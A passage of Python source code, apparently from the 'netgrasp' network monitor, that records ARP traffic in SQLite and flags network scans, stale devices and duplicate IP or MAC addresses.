ng.debugger.debug("entering log_event(%s, %s, %s, %s, %s, %s)", (mid, iid, did, rid, event, have_lock)) # Only log events for which there are subscribers. if (ng.email["enabled"] and event in ng.email["alerts"]) \ or (ng.notification["enabled"] and event in ng.notification["alerts"]): if have_lock: _log_event(mid, iid, did, rid, event) else: with exclusive_lock.ExclusiveFileLock(ng, 5, "log_event, " + event): _log_event(mid, iid, did, rid, event) ng.db.connection.commit() else: ng.debugger.debug("log_event: ignoring %s event, no subscribers", (event,)) except Exception: ng.debugger.dump_exception("log_event() caught exception") def _log_event(mid, iid, did, rid, event): ng = netgrasp_instance try: now = datetime.datetime.now() ng.db.connection.execute("INSERT INTO event (mid, iid, did, rid, timestamp, processed, type) VALUES(?, ?, ?, ?, ?, ?, ?)", (mid, iid, did, rid, now, 0, event)) except Exception: ng.debugger.dump_exception("_log_event() caught exception") def ip_is_mine(ip): ng = netgrasp_instance try: import socket ng.debugger.debug("entering ip_is_mine(%s)", (ip,)) return ip == socket.gethostbyname(socket.gethostname()) except Exception: ng.debugger.dump_exception("ip_is_mine() caught exception") def ip_has_changed(did): ng = netgrasp_instance try: ng.debugger.debug("entering ip_has_changed(%s)", (did,)) ng.db.cursor.execute("SELECT DISTINCT iid FROM activity WHERE did = ? ORDER BY updated DESC LIMIT 2", (did)) iids = ng.db.cursor.fetchall() #debugger.debug("ips: %s", (ips,)) if iids and len(iids) == 2: ng.db.cursor.execute("SELECT address FROM ip WHERE iid IN(?, ?)", (iids[0], iids[1])) ips = ng.db.cursor.fetchall() if ips: ip_a = ips[0] ip_b = ips[1] ng.debugger.debug("ips: %s, %s", (ip_a, ip_b)) if ip_a != ip_b: ng.debugger.info("ip for did %s changed from %s to %s", (did, ip_a[0], ip_b[0])) return True else: ng.debugger.debug("ip for did %s has not changed from %s", (did, ip_a[0])) return False else: ng.debugger.info("[%d] failed to load ips for iids: %s, %s", (did, iids[0], iids[1])) return False else: ng.debugger.debug("ip for did %s has not changed", (did,)) return False except Exception: ng.debugger.dump_exception("ip_has_changed() caught exception") # Database definitions. def create_database(): ng = netgrasp_instance try: ng.debugger.debug("Creating database tables, if not already existing.") # PRAGMA index_list(TABLE) with exclusive_lock.ExclusiveFileLock(ng, 5, "create_database"): # Create state table. ng.db.cursor.execute(""" CREATE TABLE IF NOT EXISTS state( id INTEGER PRIMARY KEY, key VARCHAR UNIQUE, value TEXT ) """) # @TODO make this dynamic, define globally netgrasp and schema versions ng.db.cursor.execute("INSERT OR IGNORE INTO state (key, value) VALUES('schema_version', 1)") # Record of all MAC addresses ever actively seen. ng.db.cursor.execute(""" CREATE TABLE IF NOT EXISTS mac( mid INTEGER PRIMARY KEY, vid TEXT, address TEXT, created TIMESTAMP, self NUMERIC ) """) ng.db.cursor.execute("CREATE UNIQUE INDEX IF NOT EXISTS idxmac_address ON mac (address)") ng.db.cursor.execute("CREATE INDEX IF NOT EXISTS idxmac_vid ON mac (vid)") # Record of all vendors ever actively seen. ng.db.cursor.execute(""" CREATE TABLE IF NOT EXISTS vendor( vid INTEGER PRIMARY KEY, name VARCHAR UNIQUE, created TIMESTAMP ) """) # Record of all IP addresses ever actively seen. ng.db.cursor.execute(""" CREATE TABLE IF NOT EXISTS ip( iid INTEGER PRIMARY KEY, mid INTEGER, address TEXT, created TIMESTAMP ) """) ng.db.cursor.execute("CREATE UNIQUE INDEX IF NOT EXISTS idxip_mid_iid ON ip (mid, iid)") ng.db.cursor.execute("CREATE INDEX IF NOT EXISTS idxip_address_mid_created ON ip (address, mid, created)") ng.db.cursor.execute("CREATE INDEX IF NOT EXISTS idxip_mid_iid ON ip (mid, iid)") # Cache DNS lookups. ng.db.cursor.execute(""" CREATE TABLE IF NOT EXISTS host( hid INTEGER PRIMARY KEY, iid INTEGER, name TEXT, custom_name TEXT, created TIMESTAMP, updated TIMESTAMP ) """) ng.db.cursor.execute("CREATE UNIQUE INDEX IF NOT EXISTS idxhost_iid ON host (iid)") ng.db.cursor.execute("CREATE INDEX IF NOT EXISTS idxhost_name ON host (name)") ng.db.cursor.execute("CREATE INDEX IF NOT EXISTS idxhost_custom ON host (custom_name)") ng.db.cursor.execute("CREATE INDEX IF NOT EXISTS idxhost_updated ON host (updated)") # Record of all devices ever actively seen. ng.db.cursor.execute(""" CREATE TABLE IF NOT EXISTS device( did INTEGER PRIMARY KEY, mid INTEGER, iid INTEGER, hid INTEGER, vid INTEGER, created TIMESTAMP, updated TIMESTAMP ) """) ng.db.cursor.execute("CREATE UNIQUE INDEX IF NOT EXISTS idxdevice_mid_iid ON device (mid, iid)") ng.db.cursor.execute("CREATE INDEX IF NOT EXISTS idxdevice_hid_mid_did ON device (hid, mid, did)") ng.db.cursor.execute("CREATE INDEX IF NOT EXISTS idxdevice_vid ON device (vid)") ng.db.cursor.execute("CREATE INDEX IF NOT EXISTS idxdevice_updated ON device (updated)") # Record of device activity. ng.db.cursor.execute(""" CREATE TABLE IF NOT EXISTS activity( aid INTEGER PRIMARY KEY, did INTEGER, iid INTEGER, interface TEXT, network TEXT, created TIMESTAMP, updated TIMESTAMP, counter NUMERIC, active NUMERIC ) """) ng.db.cursor.execute("CREATE INDEX IF NOT EXISTS idxactivity_active_did ON activity (active, did)") ng.db.cursor.execute("CREATE INDEX IF NOT EXISTS idxactivity_did_iid ON activity (did, iid)") ng.db.cursor.execute("CREATE INDEX IF NOT EXISTS idxactivity_did_active_counter ON activity (did, active, counter)") ng.db.cursor.execute("CREATE INDEX IF NOT EXISTS idxactivity_active_updated ON activity (active, updated)") # Record of all IP addresses ever requested. ng.db.cursor.execute(""" CREATE TABLE IF NOT EXISTS request( rid INTEGER PRIMARY KEY, did INTEGER, ip TEXT, interface TEXT, network TEXT, created TIMESTAMP, updated TIMESTAMP, counter NUMERIC, active NUMERIC ) """) ng.db.cursor.execute("CREATE INDEX IF NOT EXISTS idxrequest_active_updated ON request (active, updated)") ng.db.cursor.execute("CREATE INDEX IF NOT EXISTS idxrequest_updated ON request (updated)") ng.db.cursor.execute("CREATE INDEX IF NOT EXISTS idxrequest_active_ip ON request (active, ip)") ng.db.cursor.execute("CREATE INDEX IF NOT EXISTS idxrequest_did_created ON request (did, created)") # Create arp table. ng.db.cursor.execute(""" CREATE TABLE IF NOT EXISTS arp( aid INTEGER PRIMARY KEY, did INT, src_mac TEXT, src_ip TEXT, rid INT, dst_mac TEXT, dst_ip TEXT, interface TEXT, network TEXT, timestamp TIMESTAMP ) """) ng.db.cursor.execute("CREATE INDEX IF NOT EXISTS idxarp_srcip_timestamp_rid ON arp (src_ip, timestamp, rid)") ng.db.cursor.execute("CREATE INDEX IF NOT EXISTS idxarp_rid_srcip ON arp (rid, src_ip)") # Create event table. ng.db.cursor.execute(""" CREATE TABLE IF NOT EXISTS event( eid INTEGER PRIMARY KEY, mid INTEGER, iid INTEGER, did INTEGER, rid INTEGER, interface TEXT, network TEXT, timestamp TIMESTAMP, processed NUMERIC, type VARCHAR ) """) ng.db.cursor.execute("CREATE INDEX IF NOT EXISTS idxevent_type_timestamp_processed ON event (type, timestamp, processed)") ng.db.cursor.execute("CREATE INDEX IF NOT EXISTS idxevent_timestamp_processed ON event (timestamp, processed)") # PRAGMA index_list(event) # Update internal sqlite3 table and index statistics every time we restart. ng.db.cursor.execute("ANALYZE") ng.db.connection.commit() except Exception: ng.debugger.dump_exception("create_database() caught exception") # We've sniffed an arp packet off the wire. def received_arp(hdr, data, child_conn): ng = netgrasp_instance try: import socket import struct import dpkt from utils import exclusive_lock ng.debugger.debug("entering received_arp") now = datetime.datetime.now() packet = dpkt.ethernet.Ethernet(data) src_ip = socket.inet_ntoa(packet.data.spa) src_mac = "%x:%x:%x:%x:%x:%x" % struct.unpack("BBBBBB", packet.src) dst_ip = socket.inet_ntoa(packet.data.tpa) dst_mac = "%x:%x:%x:%x:%x:%x" % struct.unpack("BBBBBB", packet.dst) seen, requested, mid, iid, did, rid, src_mac_broadcast, ip_not_on_network, requested_self = (True, True, None, None, None, None, False, False, False) if src_mac == BROADCAST: seen = False ng.debugger.info("Ignoring arp source of %s [%s], destination %s [%s]", (src_ip, src_mac, dst_ip, dst_mac)) src_mac_broadcast = True if not ip_on_network(src_ip): seen = False ng.debugger.info("IP not on network, source of %s [%s], dst %s [%s]", (src_ip, src_mac, dst_ip, dst_mac)) ip_not_on_network = True if (dst_ip == src_ip) or (dst_mac == src_mac): requested = False ng.debugger.info("requesting self %s [%s], ignoring", (src_ip, src_mac)) requested_self = True # ARP REQUEST if packet.data.op == dpkt.arp.ARP_OP_REQUEST: ng.debugger.debug('ARP REQUEST from %s [%s] to %s [%s]', (src_ip, src_mac, dst_ip, dst_mac)) if seen: mid, iid, did = device_seen(src_ip, src_mac) if requested: rid = device_request(dst_ip, dst_mac) # ARP REPLY elif packet.data.op == dpkt.arp.ARP_OP_REPLY: ng.debugger.debug('ARP REPLY from %s [%s] to %s [%s]', (src_ip, src_mac, dst_ip, dst_mac)) if seen: mid, iid, did = device_seen(src_ip, src_mac) with exclusive_lock.ExclusiveFileLock(ng, 5, "received_arp, arp"): ng.db.cursor.execute("INSERT INTO arp (did, rid, src_mac, src_ip, dst_mac, dst_ip, timestamp) VALUES(?, ?, ?, ?, ?, ?, ?)", (did, rid, src_mac, src_ip, dst_mac, dst_ip, now)) ng.debugger.debug("inserted into arp (%s, %s, %s, %s, %s, %s, %s)", (did, rid, src_mac, src_ip, dst_mac, dst_ip, now)) if src_mac_broadcast: log_event(mid, iid, did, rid, EVENT_SRC_MAC_BROADCAST, True) if ip_not_on_network: log_event(mid, iid, did, rid, EVENT_IP_NOT_ON_NETWORK, True) if requested_self: log_event(mid, iid, did, rid, EVENT_REQUESTED_SELF, True) ng.db.connection.commit() except Exception: ng.debugger.dump_exception("received_arp() caught exception") def device_seen(ip, mac): ng = netgrasp_instance try: import datetime ng.debugger.debug("entering device_seen(%s, %s)", (ip, mac)) now = datetime.datetime.now() rid, seen_mac, first_seen_mac, seen_ip, first_seen_ip, first_seen_host, seen_host, first_seen_device, seen_vendor, first_seen_vendor = (None, False, False, False, False, False, False, False, False, False) # Get ID for MAC, creating if necessary. ng.db.cursor.execute("SELECT mid, vid FROM mac WHERE address = ?", (mac,)) seen = ng.db.cursor.fetchone() if seen: mid, vid = seen ng.debugger.debug("existing mac %s [%d, %d]", (mac, mid, vid)) seen_mac = True else: vendor = mac_lookup(mac) ng.db.cursor.execute("SELECT vendor.vid FROM vendor WHERE vendor.name = ?", (vendor,)) seen = ng.db.cursor.fetchone() if seen: vid = seen[0] ng.debugger.debug("existing vendor %s [%d]", (vendor, vid)) seen_vendor = True else: with exclusive_lock.ExclusiveFileLock(ng, 6, "device_seen, new vendor"): ng.db.cursor.execute("INSERT INTO vendor (name, created) VALUES(?, ?)", (vendor, now)) ng.db.connection.commit() first_seen_vendor = True vid = ng.db.cursor.lastrowid ng.debugger.info("new vendor %s [%d]", (vendor, vid)) with exclusive_lock.ExclusiveFileLock(ng, 6, "device_seen, new mac"): ng.db.cursor.execute("INSERT INTO mac (vid, address, created, self) VALUES(?, ?, ?, ?)", (vid, mac, now, ip_is_mine(ip))) first_seen_mac = True ng.db.connection.commit() mid = ng.db.cursor.lastrowid ng.debugger.info("new mac %s [%d]", (mac, mid)) # Get ID for IP, creating if necessary. ng.db.cursor.execute("SELECT ip.iid FROM ip WHERE ip.mid = ? AND ip.address = ?", (mid, ip)) seen = ng.db.cursor.fetchone() if seen: iid = seen[0] ng.debugger.debug("existing ip %s [%d]", (ip, iid)) seen_ip = True else: with exclusive_lock.ExclusiveFileLock(ng, 6, "device_seen, new ip"): ng.db.cursor.execute("INSERT INTO ip (mid, address, created) VALUES(?, ?, ?)", (mid, ip, now)) first_seen_ip = True ng.db.connection.commit() iid = ng.db.cursor.lastrowid ng.debugger.info("new ip %s [%d]", (ip, iid)) # Get ID for Hostname, creating if necessary. ng.db.cursor.execute("SELECT host.hid, host.name, host.custom_name FROM host WHERE host.iid = ?", (iid,)) seen = ng.db.cursor.fetchone() if seen: hid, host_name, custom_name = seen ng.debugger.debug("existing host %s (%s) [%d]", (host_name, custom_name, hid)) seen_host = True else: host_name = dns_lookup(ip) with exclusive_lock.ExclusiveFileLock(ng, 6, "device_seen, new host"): ng.db.cursor.execute("INSERT INTO host (iid, name, custom_name, created, updated) VALUES(?, ?, ?, ?, ?)", (iid, host_name, None, now, now)) ng.db.connection.commit() first_seen_host = True hid = ng.db.cursor.lastrowid ng.debugger.info("new hostname %s [%d]", (host_name, hid)) # Get ID for Device, creating if necessary. ng.db.cursor.execute("SELECT device.did FROM device WHERE device.mid = ? AND device.iid = ?", (mid, iid)) seen = ng.db.cursor.fetchone() if seen: did = seen[0] ng.debugger.debug("existing device %s (%s) [%d]", (ip, mac, did)) else: # The IP may have changed for this Device. ng.db.cursor.execute("SELECT device.did FROM device WHERE device.mid = ? AND device.hid = ?", (mid, hid)) seen = ng.db.cursor.fetchone() if seen: did = seen[0] ng.debugger.debug("existing device %s (%s) [%d] (new ip)", (ip, mac, did)) with exclusive_lock.ExclusiveFileLock(ng, 6, "device_seen, update device (new ip)"): ng.db.cursor.execute("UPDATE device SET iid = ?, updated = ? WHERE did = ?", (iid, now, did)) log_event(mid, iid, did, rid, EVENT_SEEN_DEVICE, True) log_event(mid, iid, did, rid, EVENT_CHANGED_IP, True) ng.db.connection.commit() else: with exclusive_lock.ExclusiveFileLock(ng, 6, "device_seen, new device"): ng.db.cursor.execute("INSERT INTO device (mid, iid, hid, vid, created, updated) VALUES(?, ?, ?, ?, ?, ?)", (mid, iid, hid, vid, now, now)) ng.db.connection.commit() first_seen_device = True did = ng.db.cursor.lastrowid ng.debugger.info("new device %s (%s) [%d]", (ip, mac, did)) # Finally, log activity. ng.db.cursor.execute("SELECT activity.aid FROM activity WHERE activity.did = ? AND activity.active = 1", (did,)) seen = ng.db.cursor.fetchone() with exclusive_lock.ExclusiveFileLock(ng, 6, "device_seen, log activity"): if seen: aid = seen[0] ng.db.cursor.execute("UPDATE activity SET updated = ?, iid = ?, counter = counter + 1 WHERE aid = ?", (now, iid, aid)) log_event(mid, iid, did, rid, EVENT_SEEN_DEVICE, True) else: # @TODO interface, network ng.db.cursor.execute("INSERT INTO activity (did, iid, interface, network, created, updated, counter, active) VALUES(?, ?, ?, ?, ?, ?, ?, ?)", (did, iid, None, None, now, now, 1, 1)) if not first_seen_device: log_event(mid, iid, did, rid, EVENT_FIRST_SEEN_DEVICE_RECENTLY, True) # We delayed logging these events until we know the device id (did). if seen_mac: log_event(mid, iid, did, rid, EVENT_SEEN_MAC, True) if first_seen_mac: log_event(mid, iid, did, rid, EVENT_FIRST_SEEN_MAC, True) if seen_ip: log_event(mid, iid, did, rid, EVENT_SEEN_IP, True) if first_seen_ip: log_event(mid, iid, did, rid, EVENT_FIRST_SEEN_IP, True) if seen_host: log_event(mid, iid, did, rid, EVENT_SEEN_HOST, True) if first_seen_host: log_event(mid, iid, did, rid, EVENT_FIRST_SEEN_HOST, True) if seen_vendor: log_event(mid, iid, did, rid, EVENT_SEEN_VENDOR, True) if first_seen_vendor: log_event(mid, iid, did, rid, EVENT_FIRST_SEEN_VENDOR, True) if first_seen_device: log_event(mid, iid, did, rid, EVENT_FIRST_SEEN_DEVICE, True) ng.db.connection.commit() return mid, iid, did except Exception: ng.debugger.dump_exception("device_seen() caught exception") def device_request(ip, mac): ng = netgrasp_instance try: from utils import exclusive_lock import datetime ng.debugger.debug("entering device_request(%s, %s)", (ip, mac)) now = datetime.datetime.now() mid, iid, did = get_ids(ip, mac) # Log request. ng.db.cursor.execute("SELECT request.rid, request.active FROM request WHERE request.ip = ? ORDER BY updated DESC LIMIT 1", (ip,)) seen = ng.db.cursor.fetchone() if seen: rid, active = seen if active: with exclusive_lock.ExclusiveFileLock(ng, 6, "device_request, update device request"): ng.db.cursor.execute("UPDATE request SET updated = ?, ip = ?, counter = counter + 1 WHERE rid = ?", (now, ip, rid)) log_event(mid, iid, did, rid, EVENT_REQUEST_IP, True) ng.db.connection.commit() return rid with exclusive_lock.ExclusiveFileLock(ng, 6, "device_request, new device request"): # @TODO interface, network ng.db.cursor.execute("INSERT INTO request (did, ip, interface, network, created, updated, counter, active) VALUES(?, ?, ?, ?, ?, ?, ?, ?)", (did, ip, None, None, now, now, 1, 1)) rid = ng.db.cursor.lastrowid if seen: log_event(mid, iid, did, rid, EVENT_FIRST_REQUEST_RECENTLY_IP, True) else: log_event(mid, iid, did, rid, EVENT_FIRST_REQUEST_IP, True) ng.db.connection.commit() return rid except Exception: ng.debugger.dump_exception("device_request() caught exception") def get_mac(ip): ng = netgrasp_instance try: ng.debugger.debug("entering get_mac(%s)", (ip,)) ng.db.cursor.execute("SELECT mac.address FROM mac LEFT JOIN ip ON ip.mid = mac.mid WHERE ip.address = ?", (ip,)) mac = ng.db.cursor.fetchone() if mac: return mac[0] else: return None except Exception: ng.debugger.dump_exception("get_mac() caught exception") def get_ids(ip, mac): ng = netgrasp_instance try: ng.debugger.debug("entering get_ids(%s, %s)", (ip, mac)) # Check if we know this MAC. if mac != BROADCAST: ng.db.cursor.execute("SELECT mid FROM mac WHERE address = ?", (mac,)) seen = ng.db.cursor.fetchone() if seen: mid = seen[0] else: mid = None else: # Look the MAC up in our arp cache. ng.db.cursor.execute("SELECT mid FROM ip WHERE address = ? ORDER BY created DESC LIMIT 1", (ip,)) seen = ng.db.cursor.fetchone() if seen: mid = seen[0] else: mid = None # Check if we know this IP. if mid: ng.db.cursor.execute("SELECT ip.iid FROM ip WHERE ip.mid = ? AND ip.address = ?", (mid, ip)) seen = ng.db.cursor.fetchone() if seen: iid = seen[0] else: iid = None else: iid = None # Check if we know this Host. if iid: ng.db.cursor.execute("SELECT host.hid, host.name, host.custom_name FROM host WHERE host.iid = ?", (iid,)) seen = ng.db.cursor.fetchone() if seen: hid, host_name, custom_name = seen else: hid = None else: hid = None # Check if we know this Device. if mid and iid: ng.db.cursor.execute("SELECT device.did FROM device WHERE device.mid = ? AND device.iid = ?", (mid, iid)) seen = ng.db.cursor.fetchone() if seen: did = seen[0] ng.debugger.debug("existing device %s (%s) [%d]", (ip, mac, did)) else: did = None else: did = None if not did and mid and hid: ng.db.cursor.execute("SELECT device.did FROM device WHERE device.mid = ? AND device.hid = ?", (mid, hid)) seen = ng.db.cursor.fetchone() if seen: did = seen[0] ng.debugger.debug("existing device %s (%s) [%d] (new ip)", (ip, mac, did)) else: did = None ng.debugger.debug("mid(%s) iid(%s) did(%s)", (mid, iid, did)) return mid, iid, did except Exception: ng.debugger.dump_exception("get_ids() caught exception") def get_details(did): ng = netgrasp_instance try: ng.debugger.debug("entering get_details(%s)", (did,)) ng.db.cursor.execute("SELECT activity.active, activity.counter, ip.address, mac.address, host.name, host.custom_name, vendor.name FROM activity LEFT JOIN device ON activity.did = device.did LEFT JOIN host ON device.hid = host.hid LEFT JOIN ip ON device.iid = ip.iid LEFT JOIN mac ON device.mid = mac.mid LEFT JOIN vendor ON device.vid = vendor.vid WHERE device.did = ? ORDER BY activity.updated DESC LIMIT 1", (did,)) info = ng.db.cursor.fetchone() if info: active, counter, ip, mac, host_name, custom_name, vendor = info return active, counter, ip, mac, host_name, custom_name, vendor else: ng.debugger.warning("unknown device %d", (did,)) return False except Exception: ng.debugger.dump_exception("get_details() caught exception") def first_seen(did): ng = netgrasp_instance try: ng.debugger.debug("entering first_seen(did)", (did,)) ng.db.cursor.execute("SELECT created FROM activity WHERE did = ? AND created NOT NULL ORDER BY created ASC LIMIT 1", (did,)) active = ng.db.cursor.fetchone() if active: active = active[0] if active: return active else: return False except Exception: ng.debugger.dump_exception("first_seen() caught exception") def first_seen_recently(did): ng = netgrasp_instance try: ng.debugger.debug("entering last_seen_recently(%s)", (did,)) ng.db.cursor.execute('SELECT created FROM activity WHERE did = ? AND created NOT NULL ORDER BY created DESC LIMIT 1', (did,)) recent = ng.db.cursor.fetchone() if recent: recent = recent[0] if recent: return recent else: return False except Exception: ng.debugger.dump_exception("first_seen_recently() caught exception") def last_seen(did): ng = netgrasp_instance try: ng.debugger.debug("entering last_seen(%s)", (did,)) ng.db.cursor.execute('SELECT updated FROM activity WHERE did=? AND updated NOT NULL ORDER BY updated DESC LIMIT 1', (did,)) active = ng.db.cursor.fetchone() if active: return active[0] else: return False except Exception: ng.debugger.dump_exception("last_seen() caught exception") def previously_seen(did): ng = netgrasp_instance try: ng.debugger.debug("entering previously_seen(%s)", (did,)) ng.db.cursor.execute('SELECT updated FROM activity WHERE did=? AND updated NOT NULL AND active != 1 ORDER BY updated DESC LIMIT 1', (did,)) previous = ng.db.cursor.fetchone() if previous: return previous[0] else: return False except Exception: ng.debugger.dump_exception("previously_seen() caught exception") def first_requested(did): ng = netgrasp_instance try: ng.debugger.debug("entering first_requested(%s)", (did,)) ng.db.cursor.execute('SELECT created FROM request WHERE did=? AND created NOT NULL ORDER BY created ASC LIMIT 1', (did,)) active = ng.db.cursor.fetchone() if active: return active[0] else: return False except Exception: ng.debugger.dump_exception("first_requested() caught exception") def last_requested(did): ng = netgrasp_instance try: ng.debugger.debug("entering last_requested(%s)", (did,)) ng.db.cursor.execute('SELECT updated FROM request WHERE did=? AND updated NOT NULL ORDER BY updated DESC LIMIT 1', (did,)) last = ng.db.cursor.fetchone() if last: return last[0] else: return False except Exception: ng.debugger.dump_exception("last_requested() caught exception") def time_seen(did): ng = netgrasp_instance try: ng.debugger.debug("entering time_seen(%s)", (did,)) ng.db.cursor.execute('SELECT created, updated FROM activity WHERE did=? ORDER BY updated DESC LIMIT 1', (did,)) active = ng.db.cursor.fetchone() if active: created, updated = active ng.debugger.debug("did(%d) created(%s) updated(%s)", (did, created, updated)) return updated - created else: return False except Exception: ng.debugger.dump_exception("time_seen() caught exception") def previous_ip(did): ng = netgrasp_instance try: ng.debugger.debug("entering previous_ip(%s)", (did,)) prev_ip = None ng.db.cursor.execute("SELECT DISTINCT iid FROM activity WHERE did = ? ORDER BY updated DESC LIMIT 2", (did,)) ips = ng.db.cursor.fetchall() if ips and len(ips) == 2: ng.db.cursor.execute("SELECT address FROM ip WHERE iid = ?", (ips[1])) prev_ip = ng.db.cursor.fetchone() if prev_ip: return prev_ip[0] else: return None except Exception: ng.debugger.dump_exception("previous_ip() caught exception") def active_devices_with_ip(ip): ng = netgrasp_instance try: ng.debugger.debug("entering active_devices_with_ip(%s)", (ip,)) devices = None ng.db.cursor.execute("SELECT iid FROM ip WHERE address = ?", (ip,)) ids = ng.db.cursor.fetchall() if ids: iids = [] for iid in ids: iids.append(iid[0]) ng.db.cursor.execute("SELECT DISTINCT activity.did, ip.address, mac.address FROM activity LEFT JOIN ip ON activity.iid = ip.iid LEFT JOIN mac ON ip.mid = mac.mid WHERE active = 1 AND activity.iid IN ("+ ",".join("?"*len(iids)) + ")", iids) devices = ng.db.cursor.fetchall() if devices: dids = [] for device in devices: _did, _ip, _mac = device dids.append((_did, _ip, _mac)) return dids else: return None except Exception: ng.debugger.dump_exception("active_devices_with_ip() caught exception") def active_devices_with_mac(mac): ng = netgrasp_instance try: ng.debugger.debug("entering active_devices_with_mac(%s)", (mac,)) devices = None ng.db.cursor.execute("SELECT ip.iid FROM mac LEFT JOIN ip ON mac.mid = ip.mid WHERE mac.address = ?", (mac,)) ids = ng.db.cursor.fetchall() if ids: iids = [] for iid in ids: iids.append(iid[0]) ng.db.cursor.execute("SELECT DISTINCT activity.did, ip.address, mac.address FROM activity LEFT JOIN ip ON activity.iid = ip.iid LEFT JOIN mac ON ip.mid = mac.mid WHERE active = 1 AND activity.iid IN ("+ ",".join("?"*len(iids)) + ")", iids) devices = ng.db.cursor.fetchall() if devices: dids = [] for device in devices: _did, _ip, _mac = device dids.append((_did, _ip, _mac)) return dids else: return None except Exception: ng.debugger.dump_exception("active_devices_with_mac() caught exception") def devices_requesting_ip(ip, timeout): ng = netgrasp_instance try: ng.debugger.debug("entering devices_requesting_ip(%s, %s)", (ip, timeout)) stale = datetime.datetime.now() - datetime.timedelta(seconds=timeout) dids = [] ng.db.cursor.execute("SELECT dst_ip FROM arp WHERE src_ip = ? AND rid IS NOT NULL AND timestamp < ? GROUP BY src_ip ORDER BY timestamp DESC", (ip, stale)) ips = ng.db.cursor.fetchall() if ips: for dst_ip in ips: dst_mac = get_mac(dst_ip[0]) _mid, _iid, _did = get_ids(dst_ip[0], dst_mac) dids.append((_did, dst_ip, dst_mac)) ng.debugger.debug("did, dst_ip, dst_mac(%s)", (dids,)) return dids except Exception: ng.debugger.dump_exception("devices_requesting_ip() caught exception") # Mark IP/MAC pairs as no longer active if we've not seen ARP activity for >active_timeout seconds def detect_stale_ips(): ng = netgrasp_instance try: ng.debugger.debug("entering detect_stale_ips()") stale = datetime.datetime.now() - datetime.timedelta(seconds=ng.listen["active_timeout"]) # Mark no-longer active devices stale. ng.db.cursor.execute("SELECT aid, did, iid FROM activity WHERE active = 1 AND updated < ?", (stale,)) rows = ng.db.cursor.fetchall() if rows: with exclusive_lock.ExclusiveFileLock(ng, 5, "detect_stale_ips, activity"): for row in rows: aid, did, iid = row ng.db.cursor.execute("SELECT ip.address, mac.mid, mac.address FROM ip LEFT JOIN mac ON ip.mid = mac.mid WHERE iid = ? LIMIT 1", (iid,)) address = ng.db.cursor.fetchone() if address: ip, mid, mac = address log_event(mid, iid, did, None, EVENT_STALE, True) ng.debugger.info("%s [%s] is no longer active", (ip, mac)) else: ng.debugger.error("aid(%d) did(%d) is no longer active, no ip/mac found)", (aid, did)) ng.db.cursor.execute("UPDATE activity SET active = 0 WHERE aid = ?", (aid,)) ng.db.connection.commit() # Mark no-longer active requests stale. ng.db.cursor.execute("SELECT rid, did, ip FROM request WHERE active = 1 AND updated < ?", (stale,)) rows = ng.db.cursor.fetchall() if rows: with exclusive_lock.ExclusiveFileLock(ng, 5, "detect_stale_ips, request"): for row in rows: rid, did, ip = row mid, iid = (None, None) log_event(mid, iid, did, rid, EVENT_REQUEST_STALE, True) ng.debugger.info("%s (%d) is no longer active)", (ip, did)) ng.db.cursor.execute("UPDATE request SET active = 0 WHERE rid = ?", (rid,)) ng.db.connection.commit() except Exception: ng.debugger.dump_exception("detect_stale_ips() caught exception") def detect_netscans(): ng = netgrasp_instance try: ng.debugger.debug("entering detect_netscans()") now = datetime.datetime.now() stale = datetime.datetime.now() - datetime.timedelta(seconds=ng.listen["active_timeout"]) - datetime.timedelta(minutes=10) ng.db.cursor.execute("SELECT COUNT(DISTINCT arp.dst_ip) AS count, arp.src_ip, arp.src_mac FROM arp LEFT JOIN request ON arp.rid = request.rid WHERE request.active = 1 GROUP BY arp.src_ip HAVING count > 50") scans = ng.db.cursor.fetchall() if scans: ng.debugger.debug("scans in progress (count, src ip, src mac): %s", (scans,)) for scan in scans: count, src_ip, src_mac = scan mid, iid, did = get_ids(src_ip, src_mac) ng.db.cursor.execute("SELECT eid FROM event WHERE did = ? AND type = ? AND timestamp > ?", (did, EVENT_SCAN, stale)) already_detected = ng.db.cursor.fetchone() if not already_detected: # logging rid doesn't make sense, as there's 1 rid per IP requested. log_event(mid, iid, did, None, EVENT_SCAN) ng.debugger.info("network scan by %s [%s]", (src_ip, src_mac)) except Exception: ng.debugger.dump_exception("detect_netscans() caught exception") def detect_anomalies(): ng = netgrasp_instance try: ng.debugger.debug("entering detect_anomalies()") stale = datetime.datetime.now() - datetime.timedelta(seconds=ng.listen["active_timeout"]) # Multiple MACs with the same IP. ng.db.cursor.execute("SELECT COUNT(activity.iid) AS count, ip.address FROM activity LEFT JOIN ip ON activity.iid = ip.iid WHERE activity.active = 1 GROUP BY activity.iid HAVING count > 1 ORDER BY ip.iid ASC") duplicates = ng.db.cursor.fetchall() ng.debugger.debug("duplicate ips: %s", (duplicates,)) if duplicates: for duplicate in duplicates: count, ip = duplicate ng.db.cursor.execute("SELECT ip.mid, ip.iid, activity.did FROM activity LEFT JOIN ip ON activity.iid = ip.iid WHERE ip.address = ? AND active = 1", (ip,)) dupes = ng.db.cursor.fetchall() ng.debugger.debug("dupes: %s", (dupes,)) for dupe in dupes: mid, iid, did = dupe ng.db.cursor.execute("SELECT eid FROM event WHERE mid = ? AND type = ? AND timestamp > ?", (mid, EVENT_DUPLICATE_IP, stale)) already_detected = ng.db.cursor.fetchone() if already_detected: break log_event(mid, iid, did, None, EVENT_DUPLICATE_IP) ng.debugger.info("multiple MACs with same IP: mid=%d, iid=%d", (mid, iid)) # Multiple IPs with the same MAC. ng.db.cursor.execute("SELECT COUNT(ip.mid) AS count, ip.mid FROM activity LEFT JOIN ip ON activity.iid = ip.iid WHERE activity.active = 1 GROUP BY ip.mid HAVING count > 1 ORDER BY ip.mid ASC") duplicates = ng.db.cursor.fetchall() ng.debugger.debug("duplicate macs: %s", (duplicates,)) if duplicates: for duplicate in duplicates: count, mid = duplicate ng.db.cursor.execute("SELECT ip.mid, ip.iid, activity.did FROM activity LEFT JOIN ip ON activity.iid = ip.iid WHERE ip.mid = ? AND active = 1", (mid,)) dupes = ng.db.cursor.fetchall() ng.debugger.debug("dupes: %s", (dupes,)) for dupe in dupes: mid, iid, did = dupe ng.db.cursor.execute("SELECT eid FROM event WHERE iid = ? AND type = ? AND timestamp > ?", (iid, EVENT_DUPLICATE_MAC, stale)) already_detected = ng.db.cursor.fetchone() ng.debugger.debug("already_detected: %s", (already_detected,)) if already_detected: break log_event(mid, iid, did, None, EVENT_DUPLICATE_MAC) ng.debugger.info("multiple IPs with same MAC: mid=%d, iid=%d", (mid, iid)) except Exception: ng.debugger.dump_exception("detect_anomalies() caught exception") def send_notifications(): ng = netgrasp_instance try: ng.debugger.debug("entering send_notifications()") if not ng.notification["enabled"]: ng.debugger.debug("notifications disabled") return False if not ng.notification["alerts"]: ng.debugger.debug("no notification alerts 